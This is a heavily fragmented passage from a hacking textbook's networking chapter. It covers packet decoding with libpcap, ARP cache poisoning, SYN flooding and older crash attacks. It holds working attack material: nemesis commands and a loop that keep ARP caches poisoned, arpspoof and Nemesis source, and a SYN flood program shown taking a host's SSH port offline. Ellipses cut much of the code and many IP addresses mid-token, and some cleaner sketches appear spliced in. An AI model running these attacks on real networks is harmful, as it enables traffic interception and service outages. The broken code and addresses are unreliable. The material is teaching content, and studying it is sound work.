respectively
...
A better
understanding can be gained from writing our own structures, so let's use the
structure definitions as guidance to create our own packet header structures to
include in hacking-network
...

First, let's look at the existing definition of the Ethernet header
...
h

#define ETH_ALEN 6 /* Octets in one ethernet addr */
#define ETH_HLEN 14 /* Total octets in header */
/*
* This is an Ethernet frame header
...
The variable
declaration of __be16 turns out to be a type definition for a 16-bit unsigned short
integer
...

reader@hacking:~/booksrc $
$ grep -R "typedef
...
h:typedef __u16 __bitwise __be16;

$ grep -R "typedef
...
h:typedef unsigned short __u16;
/usr/include/linux/cramfs_fs
...
h:typedef unsigned short __u16;
$

The include file also defines the Ethernet header length in ETH_HLEN as 14 bytes
...
However,
many compilers will pad structures along 4-byte boundaries for alignment, which
means that sizeof(struct ethhdr) would return an incorrect size
...

By including ...
Since we want to make our own
structures for hacking-network
...
While we're at it, let's give these fields better names
...
h
#define ETHER_ADDR_LEN 6
#define ETHER_HDR_LEN 14
struct ether_hdr {
unsigned char ether_dest_addr[ETHER_ADDR_LEN]; // Destination MAC address
unsigned char ether_src_addr[ETHER_ADDR_LEN]; // Source MAC address
unsigned short ether_type; // Type of Ethernet packet
};

We can do the same thing with the IP and TCP structures, using the
corresponding structures and RFC diagrams as a reference
...
h
struct iphdr
{
#if __BYTE_ORDER == __LITTLE_ENDIAN
unsigned int ihl:4;
unsigned int version:4;
#elif __BYTE_ORDER == __BIG_ENDIAN
unsigned int version:4;
unsigned int ihl:4;
#else
# error "Please fix ...
*/
};

From RFC 791
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service| Total Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live | Protocol | Header Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Example Internet Datagram Header

Each element in the structure corresponds to the fields shown in the RFC header
diagram
...
These fields are in the network byte order, so, if the host is little-endian, the
IHL should come before Version since the byte order is reversed
...

Added to hacking-network
...
IP headers are always 20 bytes
...
h for the
structure and RFC 793 for the header diagram
...
h
typedef u_int32_t tcp_seq;
/*
* TCP header
...

*/
struct tcphdr
{
u_int16_t th_sport; /* source port */
u_int16_t th_dport; /* destination port */
tcp_seq th_seq; /* sequence number */
tcp_seq th_ack; /* acknowledgment number */
# if __BYTE_ORDER == __LITTLE_ENDIAN
u_int8_t th_x2:4; /* (unused) */
u_int8_t th_off:4; /* data offset */
# endif
# if __BYTE_ORDER == __BIG_ENDIAN
u_int8_t th_off:4; /* data offset */
u_int8_t th_x2:4; /* (unused) */
# endif
u_int8_t th_flags;
# define TH_FIN 0x01
# define TH_SYN 0x02
# define TH_RST 0x04
# define TH_PUSH 0x08
# define TH_ACK 0x10
# define TH_URG 0x20
u_int16_t th_win; /* window */
u_int16_t th_sum; /* checksum */
u_int16_t th_urp; /* urgent pointer */
};

From RFC 793
TCP Header Format
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgment Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data | |U|A|P|R|S|F| |
| Offset| Reserved |R|C|S|S|Y|I| Window |
| | |G|K|H|T|N|N| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Data Offset: 4 bits
The number of 32 bit words in the TCP Header
...
The TCP header (even one including options) is an
integral number of 32 bits long
...
Must be zero
...
The
data offset field is important, since it tells the size of the variable-length TCP
header
...
This is because the RFC defines this field as optional
...
So the TCP header size in bytes equals
the data offset field from the header times four
...

The th_flags field of Linux's tcphdr structure is defined as an 8-bit unsigned
character
...

Added to hacking-network
...
But before we do, let's talk about
libpcap for a moment
...
Very few
programs actually use pcap_next(), because it's clumsy and inefficient
...
This means the pcap_loop()
function is passed a function pointer, which is called every time a packet is
captured
...
If
the count argument is set to -1, it will loop until the program breaks out of it
...

Naturally, the callback function needs to follow a certain prototype, since
pcap_loop() must call this function
...
It can be used to pass additional information to the callback
function, but we aren't going to be using this
...

The following example code uses pcap_loop() with a callback function to capture
packets and our header structures to decode them
...

decode_sniff
...
h>
#include "hacking
...
h"
void pcap_fatal(const char *, const char *);
void decode_ethernet(const u_char *);
void decode_ip(const u_char *);
u_int decode_tcp(const u_char *);
void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int main() {
struct pcap_pkthdr cap_header;
const u_char *packet, *pkt_data;

char errbuf[PCAP_ERRBUF_SIZE];
char *device;
pcap_t *pcap_handle;
device = pcap_lookupdev(errbuf);
if(device == NULL)
pcap_fatal("pcap_lookupdev", errbuf);
printf("Sniffing on device %s\n", device);
pcap_handle = pcap_open_live(device, 4096, 1, 0, errbuf);
if(pcap_handle == NULL)
pcap_fatal("pcap_open_live", errbuf);
pcap_loop(pcap_handle, 3, caught_packet, NULL);

pcap_close(pcap_handle);
}

At the beginning of this program, the prototype for the callback function, called
caught_packet(), is declared along with several decoding functions
...
This function is passed the pcap_handle, told to
capture three packets, and pointed to the callback function, caught_packet()
...
Also, notice that the decode_tcp() function returns a u_int
...

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char *packet) {
int tcp_header_length, total_header_size, pkt_data_len;
u_char *pkt_data;
printf("==== Got a %d byte packet ====\n", cap_header->len);

decode_ethernet(packet);
decode_ip(packet+ETHER_HDR_LEN);
tcp_header_length = decode_tcp(packet+ETHER_HDR_LEN+sizeof(struct ip_hdr));
total_header_size = ETHER_HDR_LEN+sizeof(struct ip_hdr)+tcp_header_length;
pkt_data = (u_char *)packet + total_header_size; // pkt_data points to the data portion
...
This function uses the header lengths to split the packet up by layers and
the decoding functions to print out details of each layer's header
...
This allows accessing various fields of the
header, but it's important to remember these values will be in network byte
order
...

reader@hacking:~/booksrc $ gcc -o decode_sniff decode_sniff
...
/decode_sniff
Sniffing on device eth0
==== Got a 75 byte packet ====
[[ Layer 2 :: Ethernet Header ]]
[ Source: 00:01:29:15:65:b6 Dest: 00:01:6c:eb:1d:50 Type: 8 ]
(( Layer 3 ::: IP Header ))
( Source: 192
...
42
...
168
...
249 )
( Type: 6 ID: 7755 Length: 61 )
{{ Layer 4 :::: TCP Header }}
{ Src Port: 35602 Dest Port: 7890 }
{ Seq #: 2887045274 Ack #: 3843058889 }
{ Header Size: 32 Flags: PUSH ACK }
9 bytes of packet data
74 65 73 74 69 6e 67 0d 0a | testing
...
168
...
249 Dest: 192
...
42
...
168
...
1 Dest: 192
...
42
...

reader@hacking:~/booksrc $

With the headers decoded and separated into layers, the TCP/IP connection is
much easier to understand
...
Also, notice how the sequence number in the two packets from
192
...
42
...
This is used
by the TCP protocol to make sure all of the data arrives in order, since packets
could be delayed for various reasons
...
Protocols such as FTP, POP3, and
telnet transmit data without encryption
...
From
a security perspective, this isn't too good, so more intelligent switches provide
switched network environments
...
This requires more intelligent
hardware that can create and maintain a table associating MAC addresses with
certain ports, depending on which device is connected to each port, as illustrated
here
...
But even in a switched environment, there are clever ways to
sniff other devices' packets; they just tend to be a bit more complex
...

One important aspect of network communications that can be manipulated for
interesting effects is the source address
...
The act of forging a source address in a packet is known as spoofing
...

Figure 0x400-7
...
The other two
interesting details are found in ARP
...
Second,
no state information about the ARP traffic is kept, since this would require
additional memory and would complicate a protocol that is meant to be simple
...

These three details, when exploited properly, allow an attacker to sniff network
traffic on a switched network using a technique known as ARP redirection
...
This technique is called ARP
cache poisoning
...
Then
the attacker's machine simply needs to forward these packets to their appropriate
final destinations
...
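
For reference, an ARP reply is an ordinary 42-byte frame: a 14-byte Ethernet header followed by a 28-byte ARP packet. The sketch below only fills a buffer with that layout and sends nothing. The function name build_arp_reply and the constants are hypothetical; the field order follows the standard ARP format.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define ETH_HDR_LEN   14
#define ARP_PKT_LEN   28
#define ARP_FRAME_LEN (ETH_HDR_LEN + ARP_PKT_LEN)   /* 42 bytes */

/* Fill frame (at least ARP_FRAME_LEN bytes) with an Ethernet header and an
 * ARP reply stating that sender_ip is at sender_mac. Returns the length. */
size_t build_arp_reply(uint8_t *frame,
                       const uint8_t sender_mac[6], const uint8_t sender_ip[4],
                       const uint8_t target_mac[6], const uint8_t target_ip[4])
{
    uint8_t *arp;

    assert(frame != NULL);
    arp = frame + ETH_HDR_LEN;

    memcpy(frame, target_mac, 6);         /* Ethernet destination */
    memcpy(frame + 6, sender_mac, 6);     /* Ethernet source */
    frame[12] = 0x08; frame[13] = 0x06;   /* EtherType: ARP (0x0806) */

    arp[0] = 0x00; arp[1] = 0x01;         /* hardware format: Ethernet (1) */
    arp[2] = 0x08; arp[3] = 0x00;         /* protocol format: IP (0x0800) */
    arp[4] = 6;                           /* hardware address length */
    arp[5] = 4;                           /* protocol address length */
    arp[6] = 0x00; arp[7] = 0x02;         /* opcode: reply (2) */
    memcpy(arp + 8, sender_mac, 6);       /* sender hardware address */
    memcpy(arp + 14, sender_ip, 4);       /* sender protocol address */
    memcpy(arp + 18, target_mac, 6);      /* target hardware address */
    memcpy(arp + 24, target_ip, 4);       /* target protocol address */
    return ARP_FRAME_LEN;
}
```

The receiving machine caches the pairing of sender protocol address and sender hardware address, so those two fields are the ones that matter for cache poisoning.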

Figure 0x400-8
...
The switch only filters traffic based on
MAC address, so the switch will work as it's designed to, sending A's and B's IP
traffic, destined for the attacker's MAC address, to the attacker's port
...

The switch works properly; it's the victim machines that are tricked into
redirecting their traffic through the attacker's machine
...
In order to maintain the
redirection attack, the attacker must keep the victim machines' ARP caches
poisoned
...

A gateway is a system that routes all the traffic from a local network out to the
Internet
...
For example, if a machine at
192
...
0
...
168
...
1 over a switch,
the traffic will be restricted by MAC address
...
In order to sniff this traffic, it
must be redirected
...
168
...
118 and 192
...
0
...
This can be done by pinging these hosts, since any IP
connection attempt will use ARP
...

reader@hacking:~/booksrc $ ping -c 1 -w 1 192
...
0
...
168
...
1 (192
...
0
...
168
...
1: icmp_seq=0 ttl=64 time=0
...
168
...
1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0
...
4/0
...
168
...
118
PING 192
...
0
...
168
...
118): 56 octets data
64 octets from 192
...
0
...
4 ms
--- 192
...
0
...
4/0
...
4 ms
reader@hacking:~/booksrc $ arp -na
? (192
...
0
...
168
...
118) at 00:C0:F0:79:3D:30 [ether] on eth0
reader@hacking:~/booksrc $ ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:00:AD:D1:C7:ED
inet addr:192
...
0
...
168
...
255 Mask:255
...
255
...
5 Kb) TX bytes:288567 (281
...
168
...
118 and 192
...
0
...
This way, packets can reach their final destinations
after being redirected to the attacker's machine
...
192
...
0
...
168
...
1
is at 00:00:AD:D1:C7:ED, and 192
...
0
...
168
...
118 is
also at 00:00:AD:D1:C7:ED
...
Nemesis was originally a suite
of tools written by Mark Grimes, but in the most recent version 1
...
The source code for Nemesis is on the LiveCD at
/usr/src/nemesis-1
...

reader@hacking:~/booksrc $ nemesis
NEMESIS -=- The NEMESIS Project Version 1
...

reader@hacking:~/booksrc $ nemesis arp help
ARP/RARP Packet Injection -=- The NEMESIS Project Version 1
...

reader@hacking:~/booksrc $ sudo nemesis arp -v -r -d eth0 -S 192
...
0
...
168
...
118 -h 00:00:AD:D1:C7:ED -m 00:C0:F0:79:3D:30 -H 00:00:AD:D1:C7:ED -M 00:C0:F0:79:3D:30
ARP/RARP Packet Injection -=- The NEMESIS Project Version 1
...
168
...
1 > 192
...
0
...
168
...
118 -D
192
...
0
...
4 (Build 26)

[MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
[Ethernet type] ARP (0x0806)
[Protocol addr:IP] 192
...
0
...
168
...
1
[Hardware addr:MAC] 00:00:AD:D1:C7:ED > 00:50:18:00:0F:01
[ARP opcode] Reply
[ARP hardware fmt] Ethernet (1)
[ARP proto format] IP (0x0800)
[ARP protocol len] 6
[ARP hardware len] 4
Wrote 42 byte unicast ARP request packet through linktype DLT_EN10MB
...
168
...
1 to 192
...
0
...
If these commands are repeated every 10 seconds, these
bogus ARP replies will continue to keep the ARP caches poisoned and the traffic
redirected
...
A simple BASH shell while loop is used below to
loop forever, sending our two poisoning ARP replies every 10 seconds
...
168
...
1 -D 192
...
0
...
168
...
118 -D 192
...
0
...
"
> sleep 10
> done
ARP/RARP Packet Injection -=- The NEMESIS Project Version 1
...
168
...
1 > 192
...
0
...

ARP Packet Injected
ARP/RARP Packet Injection -=- The NEMESIS Project Version 1
...
168
...
118 > 192
...
0
...

ARP Packet Injected
Redirecting
...
Nemesis uses a C library
called libnet to craft spoofed packets and inject them
...
libnet also provides several convenient functions for
dealing with network packets, such as checksum generation
...
It's well documented and the functions have descriptive names
...
The source file nemesis-arp
...
The nemesis_arp() function shown below is called in
nemesis
...

From nemesis-arp
...

void nemesis_arp(int argc, char **argv)
{
    const char *module= "ARP/RARP Packet Injection";

    nemesis_maketitle(title, module, version);

    if (argc > 1 && !strncmp(argv[1], "help", 4))
        arp_usage(argv[0]);

    arp_initdata();
    arp_cmdline(argc, argv);
    arp_validatedata();
    arp_verbose();

    if (got_payload)
    {
        if (builddatafromfile(ARPBUFFSIZE, &pd, (const char *)file,
                    (const u_int32_t)PAYLOADMODE) < 0)
            arp_exit(1);
    }

    if (buildarp(&etherhdr, &arphdr, &pd, device, reply) < 0)
    {
        printf("\n%s Injection Failure\n", (rarp == 0 ? "ARP" : "RARP"));
        arp_exit(1);
    }
    else
    {
        printf("\n%s Packet Injected\n", (rarp == 0 ? "ARP" : "RARP"));
        arp_exit(0);
    }
}

The structures ETHERhdr and ARPhdr are defined in the file nemesis
...
In C, typedef is used to alias
a data type with a symbol
...
h
typedef struct libnet_arp_hdr ARPhdr;
typedef struct libnet_as_lsa_hdr ASLSAhdr;
typedef struct libnet_auth_hdr AUTHhdr;
typedef struct libnet_dbd_hdr DBDhdr;
typedef struct libnet_dns_hdr DNShdr;
typedef struct libnet_ethernet_hdr ETHERhdr;

typedef struct libnet_icmp_hdr ICMPhdr;
typedef struct libnet_igmp_hdr IGMPhdr;
typedef struct libnet_ip_hdr IPhdr;

The nemesis_arp() function calls a series of other functions from this file:
arp_initdata(), arp_cmdline(), arp_validatedata(), and arp_verbose()
...
The
arp_initdata() function does exactly this, initializing values in statically declared
data structures
...

From nemesis-arp
...
ether_type = ETHERTYPE_ARP; /* Ethernet type ARP */
memset(etherhdr
...
ether_dhost, 0xff, 6); /* Ethernet destination address */
arphdr
...
ar_hrd = ARPHRD_ETHER; /* hardware format: Ethernet */
arphdr
...
ar_hln = 6; /* 6 byte hardware addresses */
arphdr
...
ar_sha, 0, 6); /* ARP frame sender address */
memset(arphdr
...
ar_tha, 0, 6); /* ARP frame target address */
memset(arphdr
...
file_mem = NULL;
pd
...
Judging from the way the return value from
buildarp() is handled here, buildarp() builds the packet and injects it
...
c
...
c
int buildarp(ETHERhdr *eth, ARPhdr *arp, FileData *pd, char *device,
int reply)
{
int n = 0;
u_int32_t arp_packetlen;
static u_int8_t *pkt;
struct libnet_link_int *l2 = NULL;
/* validation tests */
if (pd->file_mem == NULL)
pd->file_s = 0;
arp_packetlen = LIBNET_ARP_H + LIBNET_ETH_H + pd->file_s;
#ifdef DEBUG
printf("DEBUG: ARP packet length %u
...
\n", pd->file_s);
#endif
if ((l2 = libnet_open_link_interface(device, errbuf) ) == NULL)
{
nemesis_device_failure(INJECTION_LINK, (const char *)device);
return -1;
}
if (libnet_init_packet(arp_packetlen, &pkt) == -1)
{
fprintf(stderr, "ERROR: Unable to allocate packet memory
...
Only "
"wrote %d bytes
...
\n", n,
nemesis_lookup_linktype(l2->linktype));
}
else
{
printf("Wrote %d byte %s packet through linktype %s
...
Using libnet functions, it
opens a link interface and initializes memory for a packet
...
Next, it writes the packet to the device to inject
it, and finally cleans up by destroying the packet and closing the interface
...

From the libnet Man Page
libnet_open_link_interface() opens a low-level packet interface
...
Supplied is a u_char pointer to the
interface device name and a u_char pointer to an error buffer
...

libnet_init_packet() initializes a packet for use
...
If the memory allocation is successful, the
memory is zeroed and the function returns 1
...
Since this function calls malloc, you certainly should,
at some point, make a corresponding call to destroy_packet()
...
Supplied is the
destination address, source address (as arrays of unsigned character bytes)
and the ethernet frame type, a pointer to an optional data payload, the
payload length, and a pointer to a pre-allocated block of memory for the
packet
...

Supplied are the following: hardware address type, protocol address type, the
hardware address length, the protocol address length, the ARP packet type, the
sender hardware address, the sender protocol address, the target hardware
address, the target protocol address, the packet payload, the payload size,
and finally, a pointer to the packet header memory
...
The ARP packet type should be one of the following:
ARPOP_REQUEST, ARPOP_REPLY, ARPOP_REVREQUEST, ARPOP_REVREPLY,
ARPOP_INVREQUEST, or ARPOP_INVREPLY
...

libnet_close_link_interface() closes an opened low-level packet interface
...

With a basic understanding of C, API documentation, and common sense, you can
teach yourself just by examining open source projects
...

From the arpspoof Man Page
NAME
arpspoof - intercept packets on a switched LAN
SYNOPSIS
arpspoof [-i interface] [-t target] host
DESCRIPTION
arpspoof redirects packets from a target host (or all hosts) on the LAN
intended for another host on the LAN by forging ARP replies
...

Kernel IP forwarding (or a userland program which accomplishes the
same, e
...
fragrouter(8)) must be turned on ahead of time
...

-t target
Specify a particular host to ARP poison (if not specified, all
hosts on the LAN)
...

SEE ALSO
dsniff(8), fragrouter(8)
AUTHOR

Dug Song ...
The source code for this function should be readable to
you, since many of the previously explained libnet functions are used (shown in
bold below)
...

arpspoof
...

int
arp_send(struct libnet_link_int *llif, char *dev,
         int op, u_char *sha, in_addr_t spa, u_char *tha, in_addr_t tpa)
{
    char ebuf[128];
    u_char pkt[60];

    if (sha == NULL &&
        (sha = (u_char *)libnet_get_hwaddr(llif, dev, ebuf)) == NULL) {
        return (-1);
    }
    if (spa == 0) {
        if ((spa = libnet_get_ipaddr(llif, dev, ebuf)) == 0)
            return (-1);
        spa = htonl(spa); /* XXX */
    }
    if (tha == NULL)
        tha = "\xff\xff\xff\xff\xff\xff";

    libnet_build_ethernet(tha, sha, ETHERTYPE_ARP, NULL, 0, pkt);

    libnet_build_arp(ARPHRD_ETHER, ETHERTYPE_IP, ETHER_ADDR_LEN, 4,
                     op, sha, (u_char *)&spa, tha, (u_char *)&tpa,
                     NULL, 0, pkt + ETH_H);

    fprintf(stderr, "%s ",
            ether_ntoa((struct ether_addr *)sha));

    if (op == ARPOP_REQUEST) {
        fprintf(stderr, "%s 0806 42: arp who-has %s tell %s\n",
                ether_ntoa((struct ether_addr *)tha),
                libnet_host_lookup(tpa, 0),
                libnet_host_lookup(spa, 0));
    }
    else {
        fprintf(stderr, "%s 0806 42: arp reply %s is-at ",
                ether_ntoa((struct ether_addr *)tha),
                libnet_host_lookup(spa, 0));
        fprintf(stderr, "%s\n",
                ether_ntoa((struct ether_addr *)sha));
    }
    return (libnet_write_link_layer(llif, dev, pkt, sizeof(pkt)) == sizeof(pkt));
}

The remaining libnet functions get hardware addresses, get the IP address, and
look up hosts
...

From the libnet Man Page
libnet_get_hwaddr() takes a pointer to a link layer interface struct, a
pointer to the network device name, and an empty buffer to be used in case of
error
...

libnet_get_ipaddr() takes a pointer to a link layer interface struct, a
pointer to the network device name, and an empty buffer to be used in case of
error
...

libnet_host_lookup() converts the supplied network-ordered (big-endian) IPv4
address into its human-readable counterpart
...

Once you've learned how to read C code, existing programs can teach you a lot by
example
...
The goal here is to teach you how to learn from source code, as
opposed to just teaching how to use a few libraries
...

Denial of Service
One of the simplest forms of network attack is a Denial of Service (DoS) attack
...
There are two general forms of DoS attacks: those that crash
services and those that flood services
...
Often, these attacks are dependent on a
poor implementation by a specific vendor
...
If this program happens to be on a server, then no one
else can access that server after it has crashed
...
Since the operating
system handles the network stack, crashes in this code will take down the kernel,
denying service to the entire machine
...

SYN Flooding
A SYN flood tries to exhaust states in the TCP/IP stack
...
The
TCP/IP stack in the kernel handles this, but it has a finite table that can only track
so many incoming connections
...

The attacker floods the victim's system with many SYN packets, using a spoofed
nonexistent source address
...
Each of these
waiting, half-open connections goes into a backlog queue that has limited space
...
Instead, each half-open connection must time out, which takes a
relatively long time
...
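
The effect of a limited backlog queue can be modeled in a few lines. This is a simplified sketch, not how any particular kernel implements it: the queue size, the timeout value, and the names backlog_init, backlog_expire, and backlog_syn are all assumptions chosen for illustration.

```c
#include <assert.h>
#include <string.h>

#define BACKLOG_SLOTS 4    /* assumed tiny queue so the effect is easy to see */
#define SYN_TIMEOUT   75   /* assumed timeout in seconds, illustrative only */

struct backlog {
    long expires[BACKLOG_SLOTS];   /* 0 = free slot, otherwise expiry time */
};

void backlog_init(struct backlog *q)
{
    assert(q != NULL);
    memset(q, 0, sizeof(*q));
}

/* Free the half-open entries whose timeout has passed. */
void backlog_expire(struct backlog *q, long now)
{
    int i;

    assert(q != NULL);
    for (i = 0; i < BACKLOG_SLOTS; i++)
        if (q->expires[i] != 0 && q->expires[i] <= now)
            q->expires[i] = 0;
}

/* Handle a SYN arriving at time now (> 0). Returns 1 if a half-open slot
 * was reserved, or 0 if the queue is full and the SYN has to be dropped. */
int backlog_syn(struct backlog *q, long now)
{
    int i;

    assert(q != NULL);
    backlog_expire(q, now);
    for (i = 0; i < BACKLOG_SLOTS; i++) {
        if (q->expires[i] == 0) {
            q->expires[i] = now + SYN_TIMEOUT;
            return 1;
        }
    }
    return 0;
}
```

Because a spoofed source never completes the handshake, each slot stays occupied for the full timeout. Once every slot is taken, legitimate SYN packets are turned away until entries begin to expire.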

Using the Nemesis and arpspoof source code as reference, you should be able to
write a program that performs this attack
...
The Nemesis source code uses the function libnet_get_prand() to
obtain pseudo-random numbers for various IP fields
...
These functions are
similarly used below
...
c
#include ...

/* Returns an IP in x
...
x
...

if (network == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface
...
\n");
libnet_init_packet(packet_size, &packet); // Allocate memory for packet
...
\n");
libnet_seed_prand(); // Seed the random number generator
...
\n", dest_port, print_ip(&dest_ip));
while(1) // loop forever (until break by CTRL-C)
{
libnet_build_ip(LIBNET_TCP_H, // Size of the packet sans IP header
...

if (byte_count < packet_size)
libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written
...

}
libnet_destroy_packet(&packet); // Free packet memory
...

libnet_error(LIBNET_ERR_WARNING, "can't close network interface
...

The value doesn't change—the typecasting just appeases the compiler
...
1, which is incompatible with libnet 1
...

However, Nemesis and arpspoof still rely on the 1
...
Similar to compiling with libpcap, when compiling with libnet, the flag -lnet is used
...

reader@hacking:~/booksrc $ gcc -o synflood synflood
...
c:1:
/usr/include/libnet
...
c:6: error: syntax error before string constant
reader@hacking:~/booksrc $

The compiler still fails because several mandatory define flags need to be set for
libnet
...

reader@hacking:~/booksrc $ libnet-config --help
Usage: libnet-config [OPTIONS]
Options:
[--libs]
[--cflags]
[--defines]
reader@hacking:~/booksrc $ libnet-config --defines
-D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H
-DLIBNET_LIL_ENDIAN

Using the BASH shell's command substitution in both, these defines can be
dynamically inserted into the compile command
...
c -lnet
reader@hacking:~/booksrc $
...
/synflood
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $
...
168
...
88 22
Fatal: can't open network interface
...

reader@hacking:~/booksrc $ sudo
...
168
...
88 22
SYN Flooding port 22 of 192
...
42
...

In the example above, the host 192
...
42
...
The tcpdump output below shows the
spoofed SYN packets flooding the host from apparently random IPs
...

reader@hacking:~/booksrc $ sudo tcpdump -i eth0 -nl -c 15 "host 192
...
42
...
334498 IP 121
...
150
...
4584 > 192
...
42
...
22: S
751659999:751659999(0) win 14609
17:08:16
...
78
...
110
...
168
...
88
...
358491 IP 53
...
19
...
36638 > 192
...
42
...
22: S
322318966:322318966(0) win 43747
17:08:16
...
109
...
11
...
168
...
88
...
382492 IP 52
...
214
...
45099 > 192
...
42
...
22: S
71363071:71363071(0) win 30490
17:08:16
...
112
...
34
...
168
...
88
...
406491 IP 60
...
221
...
21573 > 192
...
42
...
22: S
2144342837:2144342837(0) win 10594
17:08:16
...
101
...
0
...
168
...
88
...
430497 IP 188
...
248
...
8409 > 192
...
42
...
22: S
1825734966:1825734966(0) win 43454
17:08:16
...
71
...
65
...
168
...
88
...
454489 IP 218
...
249
...
27982 > 192
...
42
...
22: S
1767717206:1767717206(0) win 50156
17:08:16
...
238
...
7
...
168
...
88
...
478497 IP 130
...
104
...
48221 > 192
...
42
...
22: S
2069757602:2069757602(0) win 4767
17:08:16
...
187
...
68
...
168
...
88
...
502498 IP 33
...
101
...
44358 > 192
...
42
...
22: S
1524034954:1524034954(0) win 26970
15 packets captured
30 packets received by filter
0 packets dropped by kernel
reader@hacking:~/booksrc $ ssh -v 192
...
42
...
3p2, OpenSSL 0
...
8c 05 Sep 2006
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Connecting to 192
...
42
...
168
...
88] port 22
...
168
...
88 port 22: Connection refused
ssh: connect to host 192
...
42
...
The TCP stack using syncookies adjusts the
initial sequence number of the responding SYN/ACK packet using a value
based on host details and time (to prevent replay attacks)
...
If the sequence number doesn't match or the ACK
never arrives, a connection is never created
...
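
The idea behind syncookies can be sketched as follows: the server derives the number it places in its SYN/ACK from the connection details, a coarse time counter, and a secret, and later recomputes it to validate the final ACK instead of storing state. This is a toy model only. The mixing function is a simple non-cryptographic hash, and the names toy_cookie and toy_cookie_check are hypothetical; real implementations use a different encoding.

```c
#include <assert.h>
#include <stdint.h>

/* Toy 32-bit mixer in the style of FNV-1a. NOT cryptographically secure. */
static uint32_t mix(uint32_t h, uint32_t v)
{
    int i;

    for (i = 0; i < 4; i++) {
        h ^= (v >> (8 * i)) & 0xff;
        h *= 16777619u;
    }
    return h;
}

/* Derive the value sent in the SYN/ACK without storing anything. */
uint32_t toy_cookie(uint32_t src_ip, uint32_t dst_ip,
                    uint16_t src_port, uint16_t dst_port,
                    uint32_t time_counter, uint32_t secret)
{
    uint32_t h = 2166136261u;

    assert(secret != 0);   /* a zero secret suggests it was never set */
    h = mix(h, secret);
    h = mix(h, src_ip);
    h = mix(h, dst_ip);
    h = mix(h, ((uint32_t)src_port << 16) | dst_port);
    h = mix(h, time_counter);
    return h;
}

/* The final ACK of the handshake must acknowledge cookie + 1. */
int toy_cookie_check(uint32_t ack_number, uint32_t src_ip, uint32_t dst_ip,
                     uint16_t src_port, uint16_t dst_port,
                     uint32_t time_counter, uint32_t secret)
{
    uint32_t expected = toy_cookie(src_ip, dst_ip, src_port, dst_port,
                                   time_counter, secret) + 1u;
    return ack_number == expected;
}
```

Since nothing is stored until a valid ACK arrives, a flood of SYN packets from spoofed addresses does not consume any queue space in this model.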

The Ping of Death
According to the specification for ICMP, ICMP echo messages can only have 2^16,
or 65,536, bytes of data in the data part of the packet
...

Several operating systems crashed if they were sent ICMP echo messages that
exceeded the size specified
...
" It was a very simple hack
exploiting a vulnerability that existed because no one ever considered this
possibility
...
Modern
systems are all patched against this vulnerability
...
Even though oversized ICMP packets
won't crash computers anymore, new technologies sometimes suffer from similar
problems
...
Many implementations of Bluetooth suffer from the same
oversized ping packet problem
...

Teardrop
Another crashing DoS attack that came about for the same reason was called
teardrop
...
Usually, when a packet is
fragmented, the offsets stored in the header will line up to reconstruct the
original packet with no overlap
...

Although this specific attack doesn't work anymore, understanding the concept
can reveal problems in other areas
...
IP version 6 uses more complicated headers
and even a different IP address format than the IPv4 most people are familiar
with
...

Ping Flooding
Flooding DoS attacks don't necessarily try to crash a service or resource, but
instead try to overload it so it can't respond
...

The simplest form of flooding is just a ping flood
...
The attacker sends many
large ping packets to the victim, which eat away at the bandwidth of the victim's
network connection
...
An
attacker with greater bandwidth than a victim can send more data than the victim
can receive and therefore deny other legitimate traffic from getting to the victim
...
An amplification attack uses spoofing and
broadcast addressing to amplify a single stream of packets by a hundred-fold
...
This is a network that allows
